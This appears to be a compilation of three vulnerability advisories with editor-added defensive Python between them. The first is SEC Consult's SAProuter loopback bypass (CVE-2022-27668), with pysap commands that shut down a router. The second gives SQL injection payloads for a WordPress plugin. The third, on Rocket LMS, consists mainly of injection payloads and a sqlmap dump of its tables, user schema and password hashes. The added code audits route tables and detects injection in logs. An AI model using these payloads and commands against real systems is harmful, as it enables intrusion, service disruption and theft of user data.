<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20220914-0 ><br />=======================================================================<br /> title: Improper Access Control<br /> product: SAP® SAProuter<br /> vulnerable version: see section "Vulnerable / tested versions"<br /> fixed version: see SAP security note 3158375<br /> CVE number: CVE-2022-27668<br /> impact: high<br /> homepage: https://support.sap.com/en/tools/connectivity-tools/saprouter.html<br /> found: 2022-02-25<br /> by: Fabian Hagg (Office Vienna)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Atos company<br /> Europe | Asia | North America<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"SAProuter is a software application that provides a remote connection<br />between our customer's network and SAP. SAProuter can be used to:<br /><br />- Improve network security, e.g. by using a password or by only allowing<br /> encrypted connections from known sources<br />- Control and log the connections to your SAP system<br />- Set up an indirect connection when programs involved cannot<br /> communicate with each other due to the network configuration<br />- Increase performance and stability by reducing the SAP system workload<br /> within a local area network (LAN) when communicating with a wide area<br /> network (WAN)" [1]<br /><br />[1] https://support.sap.com/en/tools/connectivity-tools/saprouter.html<br /><br /><br />Business recommendation:<br />------------------------<br />SEC Consult recommends implementing security note 3158375, where the<br />documented issue is fixed according to the vendor. 
We advise installing the<br />correction as a matter of priority to keep business-critical data secured.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Improper Access Control (CVE-2022-27668)<br />According to SAP note 1853140: "in the default configuration, the<br />SAProuter does not allow a route to itself. You can explicitly permit<br />the 'loopback' from the SAProuter to itself using option -X".<br /><br />It was identified that under certain circumstances this restriction does<br />not hold. External attackers with network access to a (weakly configured)<br />SAProuter instance can exploit an improper access control vulnerability by<br />sending packets of type NI_ROUTE in order to establish a tunnel to the<br />SAProuter's own loopback interface, which allows managing the SAProuter<br />externally even when it was started without option -X.<br /><br />This enables an attacker to send packets of type ROUTER_ADM in order to<br />gain unauthorized access to administrative functions such as stopping<br />the remote SAProuter instance, displaying connection information,<br />switching the trace level, or terminating a specific connection.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Improper Access Control (CVE-2022-27668)<br />For successful exploitation of this vulnerability, the following prerequisites<br />must be met:<br /><br />- Route permission table saprouttab must contain an entry that<br /> explicitly permits external hosts to connect to port 3299 of<br /> arbitrary hosts. Some examples of such entries are shown in<br /> the following listing:<br /><br /> P <source-host incl. attacker-controlled machine> * 3299<br /> P <source-host incl. attacker-controlled machine> * 3200.3300<br /><br />- SAProuter is running (option -X does not need to be set) and the<br /> attacker can reach its listening port (TCP 3299 by default).<br /><br />The vulnerability can be verified by means of the publicly available<br />Python script router_portfw.py [2] of the open source pysap framework<br />developed by M. Gallo. The script, which is based on a scapy re-implementation<br />of the proprietary SAP Router protocol, allows for port forwarding through<br />a SAProuter service.<br /><br />For demonstration purposes, the following simplified lab setup is used:<br /><br />-------------------------------------------------------------------------<br />SAProuter (IPv4:192.168.56.103) <-----> Attacker (IPv4:192.168.56.104)<br />-------------------------------------------------------------------------<br />SAProuter started with option -r: | Pysap framework<br />./saprouter -r |<br /> |<br />Content of saprouttab in workdir: |<br />P 192.168.56.104 * 3299 |<br />-------------------------------------------------------------------------<br /><br />The following listing shows that it is not possible to establish a<br />"loopback" tunnel through the remote SAProuter service by specifying a<br />target destination host 127.0.0.1 (option -t) and target destination<br />port 3299 (option -r). 
As expected, this route is filtered and denied<br />by default even when explicitly allowed through the route permission<br />table.<br /><br />--------------------------------------------------------------------------<br />attacker@192.168.56.104$ python router_portfw.py -d 192.168.56.103 -p 3299<br />-t 127.0.0.1 -r 3299 -a 127.0.0.1 -l 3299 -v<br />[*] Setting a proxy between 127.0.0.1:3299 and remote SAP Router 192.168.<br />56.103:3299 (talk mode raw)<br />SAPNIProxy: Binded to address 127.0.0.1:3299, proxying to 192.168.56.103:<br />3299<br />Routing to 127.0.0.1:3299<br />To send 61 bytes data + 4 bytes NI header<br />Received 4 bytes NI header, to receive 211 bytes data<br />Received 211 bytes data<br />Route request to 127.0.0.1:3299 not accepted by 192.168.56.103:3299<br />--------------------------------------------------------------------------<br /><br />It was discovered that it is possible to circumvent this check using<br />the unspecified IPv4 address 0.0.0.0, which RFC 1122 defines as "this host<br />on this network" (see also RFC 5735). On Linux a connect() to 0.0.0.0 is<br />delivered to the local host, so the route ends at the SAProuter's own<br />loopback interface although the literal destination 127.0.0.1 is filtered.<br />When specifying destination host 0.0.0.0 and destination port 3299,<br />this leads to an effective access control bypass as can be seen in the<br />following listing.<br /><br />--------------------------------------------------------------------------<br />attacker@192.168.56.104$ python router_portfw.py -d 192.168.56.103 -p 3299<br />-t 0.0.0.0 -r 3299 -a 127.0.0.1 -l 3299 -v<br />[*] Setting a proxy between 127.0.0.1:3299 and remote SAP Router 192.168.<br />56.103:3299 (talk mode raw)<br />SAPNIProxy: Binded to address 127.0.0.1:3299, proxying to 192.168.56.103:<br />3299<br />Routing to 0.0.0.0:3299<br />To send 59 bytes data + 4 bytes NI header<br />Received 4 bytes NI header, to receive 8 bytes data<br />Received 8 bytes data<br />Route request to 0.0.0.0:3299 accepted by 192.168.56.103:3299<br /><br />attacker@192.168.56.104$ ss -antlp | grep "3299"<br />LISTEN 0 5 127.0.0.1:3299 0.0.0.0:* users:(("python",pid=1985,fd=3))<br />--------------------------------------------------------------------------<br /><br />Once the tunnel is established, an attacker can invoke administrative<br />functions via the local port 3299, which is forwarded to the loopback<br />interface of the remote SAProuter instance. For example, the Python<br />script router_admin.py [3] of the pysap framework can be used to<br />shut down (option -s) the running SAProuter instance on the remote host.<br /><br />--------------------------------------------------------------------------<br />attacker@192.168.56.104$ python router_admin.py -s -d 127.0.0.1 -p 3299<br />[*] Requesting stop of the remote SAP Router<br />[*] Connected to the SAP Router 127.0.0.1:3299<br />[*] Using SAP Router version 40<br />[*] Sending Router Admin packet<br /><br /><br />netwadm@192.168.56.103$ ./saprouter -r<br /><br />trcfile dev_rout<br />no logging active<br /><br />WARNING: wildcard character used in route target<br /><br />shutdown message received, good bye ...<br />--------------------------------------------------------------------------<br /><br />External links:<br />[2] https://github.com/SecureAuthCorp/pysap/blob/master/examples/router_portfw.py<br />[3] https://github.com/SecureAuthCorp/pysap/blob/master/examples/router_admin.py<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following versions of the binary were found to be vulnerable during our tests:<br /><br />- SAProuter as part of kernel 753 patch no. 400 (Linux, 64 BIT UNICODE)<br />- SAProuter as part of kernel 777 patch no. 200 (Linux, 64 BIT UNICODE)<br /><br />No additional testing on other releases has been carried out. 
According to the vendor<br />the following releases and versions are affected by the discovered vulnerability:<br /><br />- KRNL64NUC 7.49 <br />- KRNL64UC 7.49 <br />- SAP_ROUTER 7.53 <br />- SAP_ROUTER 7.22 <br />- KERNEL 7.49 <br />- KERNEL 7.77 <br />- KERNEL 7.81 <br />- KERNEL 7.85 <br />- KERNEL 7.86 <br />- KERNEL 7.87 <br />- KERNEL 7.88<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2022-02-25: Contacting vendor through vulnerability submission web form.<br />2022-03-05: Vendor confirms receipt and assigns internal ID #2270010706.<br />2022-04-04: Requesting status update.<br />2022-04-05: Vendor confirms vulnerability and states that a fix is already<br /> complete. The corresponding security note is expected to be<br /> released with the upcoming April 2022 patch day.<br />2022-04-12: Patch day April 2022 passed without release.<br />2022-05-10: Patch day May 2022 passed without release.<br />2022-06-14: Vendor releases patch with SAP Security Note 3158375.<br />2022-06-14: Requesting confirmation that the finding was fixed by the<br /> published security note as no prior notification was provided.<br />2022-06-28: Vendor confirms that the patch included in Security Note 3158375<br /> fixes the issue. The vulnerability got assigned CVE-2022-27668.<br />2022-09-14: Release of this security advisory.<br /><br /><br />Solution:<br />---------<br />The vendor provides a patched version which should be installed immediately.<br />The software can be obtained via the SAP service marketplace. Further<br />information can be found in the corresponding Security Note 3158375 [4].<br /><br />[4] https://launchpad.support.sap.com/#/notes/3158375<br /><br /><br />Workaround:<br />-----------<br />Remove any wildcard (*) values in the target host or IP address directive<br />in route permission table saprouttab entries 'P' and 'S'. 
In general, it<br />is recommended not to use wildcard values in the route permission table<br />saprouttab at all. Additional information on the secure configuration of<br />SAProuter can be found in SAP Security Note/KBA 1895350 [5].<br /><br />[5] https://launchpad.support.sap.com/#/notes/1895350<br /><br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult, an Atos company<br />Europe | Asia | North America<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Atos company. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF F. Hagg / @2022<br /><br /></code></pre>
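Added example (editor's code, not part of the SEC Consult advisory and not SAP or pysap code): it audits a saprouttab for the wildcard-target entries the advisory lists as prerequisites, and puts the loopback check the PoC defeats next to a hardened one that normalises the target address before comparing it, so that 0.0.0.0, the whole 127/8 block and the router's own interface addresses are all refused. The sample table, the helper names and the hardened check itself are assumptions; the fix SAP shipped in note 3158375 is not on this page.

```python
"""Added example, not code from the advisory, SAP or pysap: audit a saprouttab
for the wildcard-target entries CVE-2022-27668 needs, and show why the
loopback check the advisory describes is bypassed by 0.0.0.0.  The sample
table, the hardened check and the helper names are the editor's assumptions;
the actual fix shipped in SAP note 3158375 is not on this page."""
import ipaddress
import re

# Constructed sample route permission table.  Field layout follows the
# saprouttab format: <P|S|D|KP|KS|KD> <source-host> <dest-host> <dest-serv> [<password>]
SAMPLE_SAPROUTTAB = """\
# the two entry shapes the advisory lists as prerequisites
P 192.168.56.104 *        3299
P 192.168.56.104 *        3200.3300
# tightly scoped entries: one target host, one service
P 10.0.*.*       10.1.2.3 3200
S 10.0.0.5       sapgw01  3300
# default deny
D *              *        *
"""


def parse_saprouttab(text):
    """Yield (kind, source, dest, serv) for every rule; '#' starts a comment."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        if len(fields) < 4:
            continue  # malformed entry, ignored here
        yield tuple(fields[:4])


def serv_covers(serv, port):
    """True if a dest-serv field covers TCP `port`: '*', one port, or an
    inclusive 'low.high' range as used in the advisory (3200.3300)."""
    if serv == "*":
        return True
    m = re.fullmatch(r"(\d+)\.(\d+)", serv)
    if m:
        return int(m.group(1)) <= port <= int(m.group(2))
    return serv.isdigit() and int(serv) == port


def find_wildcard_routes(text, port=3299):
    """Permit entries whose target host is '*' and whose service covers
    `port`: exactly the entries the workaround section says to remove."""
    return [
        entry
        for entry in parse_saprouttab(text)
        if entry[0] in ("P", "S", "KP", "KS")
        and entry[2] == "*"
        and serv_covers(entry[3], port)
    ]


def naive_is_loopback(host):
    """The behaviour observed in the PoC: only the literal 127.0.0.1 is refused."""
    return host == "127.0.0.1"


def hardened_is_loopback(host, local_addrs=frozenset()):
    """Editor's hardened check (an assumption, not SAP's code): parse the
    target and refuse the whole loopback range, the unspecified address
    0.0.0.0 / :: (a Linux connect() to 0.0.0.0 reaches the local host),
    'localhost', and any of the router's own interface addresses."""
    if host.lower() == "localhost" or host in local_addrs:
        return True
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return False  # hostnames other than localhost are resolved elsewhere
    return addr.is_loopback or addr.is_unspecified


if __name__ == "__main__":
    for entry in find_wildcard_routes(SAMPLE_SAPROUTTAB):
        print("wildcard target:", " ".join(entry))
    for target in ("127.0.0.1", "0.0.0.0", "127.8.8.8", "192.168.56.103"):
        print(target, "naive:", naive_is_loopback(target),
              "hardened:", hardened_is_loopback(target, {"192.168.56.103"}))
```

Run it against a real saprouttab by reading the file into `find_wildcard_routes`; every entry it reports lets its source reach any host, including the router itself, on the SAProuter port. The `local_addrs` argument matters because a route to the router's own interface address is a loopback too, even though no 127.x.x.x or 0.0.0.0 literal appears in it.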
<pre><code>## Title: Social Share Buttons-2.2.3 SQLi<br />## Author: nu11secur1ty<br />## Date: 09.16.2022<br />## Vendor: Supsystic (plugin distributed via https://wordpress.org/)<br />## Software: https://downloads.wordpress.org/plugin/social-share-buttons-by-supsystic.2.2.3.zip<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Social-Share-Buttons-2.2.3<br /><br /><br />## Description:<br />The `project_id` POST parameter of the Social Share Buttons 2.2.3 WordPress<br />plugin (AJAX action `social-sharing-share`) is vulnerable to SQL injection.<br />The value is used in a database query without proper sanitisation, so an<br />attacker can extract the entire WordPress database through boolean-based<br />or time-based blind injection, as the sqlmap output below confirms.<br />WARNING: The attacker can retrieve the whole database of the affected site.<br />NOTE: The users of this system are NOT protected; this SQL injection<br />vulnerability is CRITICAL.<br /><br />STATUS: HIGH Vulnerability<br /><br />[+]Payload:<br /><br />```mysql<br />---<br />Parameter: project_id (POST)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: action=social-sharing-share&project_id=378116348' or<br />'3724'='3724' AND 7995=7995 AND 'rQVH'='rQVH&network_id=5&post_id=<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: action=social-sharing-share&project_id=378116348' or<br />'3724'='3724' AND (SELECT 9167 FROM (SELECT(SLEEP(5)))dQDw) AND<br />'KWbC'='KWbC&network_id=5&post_id=<br />---<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WordPress/2022/Social-Share-Buttons-2.2.3)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/m9r76w)<br /><br /><br /></code></pre>
<pre><code>C r a C k E r<br />T H E C R A C K O F E T E R N A L M I G H T<br /><br />From The Ashes and Dust Rises An Unimaginable crack....<br /><br />[ Exploits ]<br /><br />Author   : CraCkEr<br />Website  : rocket-soft.org<br />Vendor   : RocketSoft<br />Software : Rocket LMS v1.6<br />Vuln Type: Remote SQL Injection<br />Method   : GET<br />Impact   : Database Access<br /><br />Rocket LMS - Learning Management System is an online course marketplace<br />with a pile of features that helps you to run your online education<br />business easily.<br /><br />B4nks-NET irc.b4nks.tk #unix<br /><br />Release Notes:<br />Typically used for remotely exploitable vulnerabilities that can lead to<br />system compromise.<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL<br /> Ivo @palaziv<br /><br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /><br />© CraCkEr 2022<br /><br /><br />GET parameter 'min_age' is vulnerable<br /><br />---<br />Parameter: min_age (GET)<br /> Type: boolean-based blind<br /> Title: Boolean-based blind - Parameter replace (original value)<br /> Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=(SELECT (CASE WHEN (8536=8536) THEN 18 ELSE (SELECT 7625 UNION SELECT 1202) END))&max_age=99&day[]=saturday&min_time=&max_time=&country_id=<br /><br /> Type: error-based<br /> Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)<br /> Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18 AND GTID_SUBSET(CONCAT(0x71706a6271,(SELECT (ELT(1687=1687,1))),0x71786a6a71),1687)&max_age=99&day[]=saturday&min_time=&max_time=&country_id=<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18 AND (SELECT 2819 FROM (SELECT(SLEEP(5)))SBYp)&max_age=99&day[]=saturday&min_time=&max_time=&country_id=<br />---<br /><br /><br />GET parameter 'max_age' is vulnerable<br /><br />---<br />Parameter: max_age (GET)<br /> Type: boolean-based blind<br /> Title: Boolean-based blind - Parameter replace (original value)<br /> Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18&max_age=(SELECT (CASE 
WHEN (2763=2763) THEN 99 ELSE (SELECT 3665 UNION SELECT 7462) END))&day[]=saturday&min_time=&max_time=&country_id=<br /><br /> Type: error-based<br /> Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)<br /> Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18&max_age=99 AND GTID_SUBSET(CONCAT(0x71706a6271,(SELECT (ELT(5555=5555,1))),0x71786a6a71),5555)&day[]=saturday&min_time=&max_time=&country_id=<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: sort=top_rate&category_id=520&level_of_training=beginner&gender=man&role=teacher&meeting_type=all&population=all&min_price=&max_price=&min_age=18&max_age=99 AND (SELECT 2169 FROM (SELECT(SLEEP(5)))mngI)&day[]=saturday&min_time=&max_time=&country_id=<br />--- <br /> <br /><br />[+] Starting the Attack<br /><br />[INFO] fetching current database<br />[INFO] the back-end DBMS is MySQL<br />web application technology: Apache 2, PHP 7.4.30<br />back-end DBMS: MySQL >= 5.6<br /><br />current database: 'admin_learn'<br /><br /><br />[INFO] fetching tables for database: 'admin_learn'<br /><br />Database: admin_learn<br />[184 tables]<br />+------------------------------------------------+<br />| groups |<br />| accounting |<br />| advertising_banners |<br />| advertising_banners_translations |<br />| affiliates |<br />| affiliates_codes |<br />| agora_history |<br />| badge_translations |<br />| badges |<br />| become_instructors |<br />| blog |<br />| blog_categories |<br />| blog_translations |<br />| bundle_filter_option |<br />| bundle_translations |<br />| bundle_webinars |<br />| bundles |<br />| cart |<br />| categories |<br />| category_translations |<br />| certificate_template_translations |<br />| certificates |<br />| certificates_templates |<br />| comments |<br />| comments_reports |<br />| contacts |<br />| 
course_forum_answers |<br />| course_forums |<br />| course_learning |<br />| course_noticeboard_status |<br />| course_noticeboards |<br />| delete_account_requests |<br />| discount_categories |<br />| discount_courses |<br />| discount_groups |<br />| discount_users |<br />| discounts |<br />| faq_translations |<br />| faqs |<br />| favorites |<br />| feature_webinar_translations |<br />| feature_webinars |<br />| file_translations |<br />| files |<br />| filter_option_translations |<br />| filter_options |<br />| filter_translations |<br />| filters |<br />| follows |<br />| forum_featured_topics |<br />| forum_recommended_topic_items |<br />| forum_recommended_topics |<br />| forum_topic_attachments |<br />| forum_topic_bookmarks |<br />| forum_topic_likes |<br />| forum_topic_posts |<br />| forum_topic_reports |<br />| forum_topics |<br />| forum_translations |<br />| forums |<br />| group_users |<br />| groups_registration_packages |<br />| home_sections |<br />| jazzcash_transactions |<br />| meeting_times |<br />| meetings |<br />| migrations |<br />| navbar_button_translations |<br />| navbar_buttons |<br />| newsletters |<br />| newsletters_history |<br />| noticeboards |<br />| noticeboards_status |<br />| notification_templates |<br />| notifications |<br />| notifications_status |<br />| offline_payments |<br />| order_items |<br />| orders |<br />| page_translations |<br />| pages |<br />| password_resets |<br />| payku_payments |<br />| payku_transactions |<br />| payment_channels |<br />| payouts |<br />| payu_transactions |<br />| permissions |<br />| prerequisites |<br />| product_categories |<br />| product_category_translations |<br />| product_discounts |<br />| product_faq_translations |<br />| product_faqs |<br />| product_file_translations |<br />| product_files |<br />| product_filter_option_translations |<br />| product_filter_options |<br />| product_filter_translations |<br />| product_filters |<br />| product_media |<br />| 
product_orders |<br />| product_reviews |<br />| product_selected_filter_options |<br />| product_selected_specification_multi_values |<br />| product_selected_specification_translations |<br />| product_selected_specifications |<br />| product_specification_categories |<br />| product_specification_multi_value_translations |<br />| product_specification_multi_values |<br />| product_specification_translations |<br />| product_specifications |<br />| product_translations |<br />| products |<br />| promotion_translations |<br />| promotions |<br />| purchases |<br />| quiz_question_translations |<br />| quiz_translations |<br />| quizzes |<br />| quizzes_questions |<br />| quizzes_questions_answer_translations |<br />| quizzes_questions_answers |<br />| quizzes_results |<br />| rating |<br />| regions |<br />| registration_packages |<br />| registration_packages_translations |<br />| reserve_meetings |<br />| rewards |<br />| rewards_accounting |<br />| roles |<br />| sales |<br />| sales_log |<br />| sections |<br />| session_reminds |<br />| session_translations |<br />| sessions |<br />| setting_translations |<br />| settings |<br />| special_offers |<br />| subscribe_reminds |<br />| subscribe_translations |<br />| subscribe_uses |<br />| subscribes |<br />| support_conversations |<br />| support_department_translations |<br />| support_departments |<br />| supports |<br />| tags |<br />| testimonial_translations |<br />| testimonials |<br />| text_lesson_translations |<br />| text_lessons |<br />| text_lessons_attachments |<br />| ticket_translations |<br />| ticket_users |<br />| tickets |<br />| trend_categories |<br />| users |<br />| users_badges |<br />| users_cookie_security |<br />| users_manual_purchase |<br />| users_metas |<br />| users_occupations |<br />| users_registration_packages |<br />| users_zoom_api |<br />| verifications |<br />| webinar_assignment_attachments |<br />| webinar_assignment_history |<br />| webinar_assignment_history_messages 
|<br />| webinar_assignment_translations |<br />| webinar_assignments |<br />| webinar_chapter_items |<br />| webinar_chapter_translations |<br />| webinar_chapters |<br />| webinar_extra_description_translations |<br />| webinar_extra_descriptions |<br />| webinar_filter_option |<br />| webinar_partner_teacher |<br />| webinar_reports |<br />| webinar_reviews |<br />| webinar_translations |<br />| webinars |<br />+------------------------------------------------+<br /><br /><br />[INFO] fetching columns for table 'users' in database 'admin_learn'<br /><br />Database: admin_learn<br />Table: users<br />[49 columns]<br /><br />+--------------------+-------------------------------------+<br />| Column | Type |<br />+--------------------+-------------------------------------+<br />| language | varchar(255) |<br />| about | text |<br />| access_content | tinyint(1) |<br />| account_id | varchar(128) |<br />| account_type | varchar(128) |<br />| address | varchar(255) |<br />| affiliate | tinyint(1) |<br />| avatar | varchar(255) |<br />| avatar_settings | varchar(255) |<br />| ban | tinyint(1) |<br />| ban_end_at | int(10) unsigned |<br />| ban_start_at | int(10) unsigned |<br />| bio | varchar(128) |<br />| can_create_store | tinyint(1) |<br />| certificate | varchar(128) |<br />| city_id | int(10) unsigned |<br />| commission | int(10) unsigned |<br />| country_id | int(10) unsigned |<br />| cover_img | varchar(255) |<br />| created_at | int(11) |<br />| deleted_at | int(11) |<br />| district_id | int(10) unsigned |<br />| email | varchar(255) |<br />| facebook_id | varchar(255) |<br />| financial_approval | tinyint(1) |<br />| full_name | varchar(128) |<br />| google_id | varchar(255) |<br />| headline | varchar(255) |<br />| iban | varchar(128) |<br />| id | int(10) unsigned |<br />| identity_scan | varchar(128) |<br />| level_of_training | bit(3) |<br />| location | point |<br />| meeting_type | enum('all','in_person','online') |<br />| mobile | varchar(32) |<br 
/>| newsletter | tinyint(1) |<br />| offline | tinyint(1) |<br />| offline_message | text |<br />| organ_id | int(11) |<br />| password | varchar(255) |<br />| province_id | int(10) unsigned |<br />| public_message | tinyint(1) |<br />| remember_token | varchar(255) |<br />| role_id | int(10) unsigned |<br />| role_name | varchar(64) |<br />| status | enum('active','pending','inactive') |<br />| timezone | varchar(255) |<br />| updated_at | int(11) |<br />| verified | tinyint(1) |<br />+--------------------+-------------------------------------+<br /><br /><br />[INFO] fetching entries of column(s) 'account_id,account_type,email,id,password' for table 'users' in database 'admin_learn'<br /><br />Database: admin_learn<br />Table: users<br />[4 entries]<br /><br />+------+---------------+---------------------+-----------------------------+--------------------------------------------------------------+<br />| id | account_id | account_type | email | password |<br />+------+---------------+---------------------+-----------------------------+--------------------------------------------------------------+<br />| 1 | NULL | NULL | admin@demo.com | $2y$10$nSUg1Z2rltHGecudC6dEEeRoqfIhlHi8WaAFFQs57oyFtpkvvQufW |<br />| 867 | NULL | NULL | organization@demo.com | $2y$10$W0.rfZgYCWGr/rOSrGrGg.Nnm6xBVdR3FYjJiXqiq6LZdx2Ds.aXq |<br />| 995 | NULL | NULL | student@demo.com | $2y$10$Hc4OzTkL3i5vmHXXvZvSfOsZDMD/XYwO4yS8UOtUIAFQcXYhIIJsa |<br />| 1015 | NULL | NULL | instructor@demo.com | $2y$10$8.jgtS/cg8L6HfuuBgWnkeg49r0LiY7kofR6eiY9b.mx747i82n.u |<br />+------+---------------+---------------------+-----------------------------+--------------------------------------------------------------+<br /><br /><br />[-] Done<br /></code></pre>
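Added example (editor's code, not from either the Social Share Buttons or the Rocket LMS advisory): the sqlmap payloads both advisories print fall into four recognisable techniques (time-based SLEEP, error-based GTID_SUBSET, boolean tautologies such as '3724'='3724', and CASE WHEN / UNION SELECT replacement), and this scanner looks for them in web server access logs. The log lines are constructed from the advisories' own payloads; the paths, client addresses, timestamps and the signature set are assumptions.

```python
"""Added example, not code from either advisory: run the blind-SQLi payload
patterns sqlmap produced above (SLEEP, GTID_SUBSET, tautologies,
CASE/UNION) over web server access logs.  The log lines are constructed;
the application paths, client addresses and timestamps are assumptions."""
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-format lines.  The query strings are the
# min_age payloads quoted in the Rocket LMS advisory, URL-encoded as sent;
# the last line is a benign request to the same endpoint.
SAMPLE_ACCESS_LOG = """\
203.0.113.7 - - [16/Sep/2022:10:01:02 +0000] "GET /search?sort=top_rate&min_age=18%20AND%20%28SELECT%202819%20FROM%20%28SELECT%28SLEEP%285%29%29%29SBYp%29&max_age=99 HTTP/1.1" 200 5123 "-" "sqlmap/1.6"
203.0.113.7 - - [16/Sep/2022:10:01:03 +0000] "GET /search?sort=top_rate&min_age=18%20AND%20GTID_SUBSET%28CONCAT%280x71706a6271%2C%28SELECT%20%28ELT%281687%3D1687%2C1%29%29%29%2C0x71786a6a71%29%2C1687%29&max_age=99 HTTP/1.1" 500 812 "-" "sqlmap/1.6"
203.0.113.7 - - [16/Sep/2022:10:01:04 +0000] "GET /search?min_age=%28SELECT%20%28CASE%20WHEN%20%288536%3D8536%29%20THEN%2018%20ELSE%20%28SELECT%207625%20UNION%20SELECT%201202%29%20END%29%29&max_age=99 HTTP/1.1" 200 5123 "-" "sqlmap/1.6"
198.51.100.4 - - [16/Sep/2022:10:02:10 +0000] "GET /search?sort=top_rate&min_age=18&max_age=99 HTTP/1.1" 200 5123 "-" "Mozilla/5.0"
"""

# The Social Share Buttons payload travels in a POST body, which a plain
# access log never records; scan_request() can be fed from a WAF or
# application log that keeps bodies.  Constructed from the advisory's payload.
SAMPLE_POST_BODY = ("action=social-sharing-share&project_id=378116348' or "
                    "'3724'='3724' AND 7995=7995 AND 'rQVH'='rQVH&network_id=5&post_id=")

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# One signature per injection technique visible in the payloads above.
SIGNATURES = {
    "time-based (SLEEP)": re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I),
    "error-based (GTID_SUBSET/EXTRACTVALUE/UPDATEXML)":
        re.compile(r"\b(?:GTID_SUBSET|EXTRACTVALUE|UPDATEXML)\s*\(", re.I),
    # OR/AND followed by x=x with the same literal on both sides
    "boolean tautology": re.compile(r"\b(?:OR|AND)\s+'?(\w+)'?\s*=\s*'?\1\b", re.I),
    "conditional CASE / UNION SELECT":
        re.compile(r"\bCASE\s+WHEN\b.*?\bTHEN\b|\bUNION\s+SELECT\b", re.I | re.S),
}


def decode_request(text):
    """URL-decode up to twice so double-encoded payloads are seen in clear."""
    for _ in range(2):
        decoded = unquote_plus(text)
        if decoded == text:
            break
        text = decoded
    return text


def scan_request(text):
    """Return the names of the techniques matched in one query string or body."""
    decoded = decode_request(text)
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]


def scan_access_log(log_text):
    """Parse combined-format lines and report requests whose query string
    matches at least one signature."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        client, method, target, status = m.groups()
        path, _, query = target.partition("?")
        hits = scan_request(query)
        if hits:
            findings.append({"client": client, "method": method, "path": path,
                             "status": int(status), "techniques": hits})
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f"{f['client']} {f['method']} {f['path']} -> {f['status']}: "
              + ", ".join(f["techniques"]))
    print("POST body:", scan_request(SAMPLE_POST_BODY))
```

The tautology pattern is the noisiest of the four (a free-text search for "salt and pepper=pepper" would trip it), so in production treat it as a weak indicator and correlate it with the client address and with 5xx responses, which the error-based technique produces by design. The 500 on the GTID_SUBSET line above is the kind of pairing worth alerting on.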
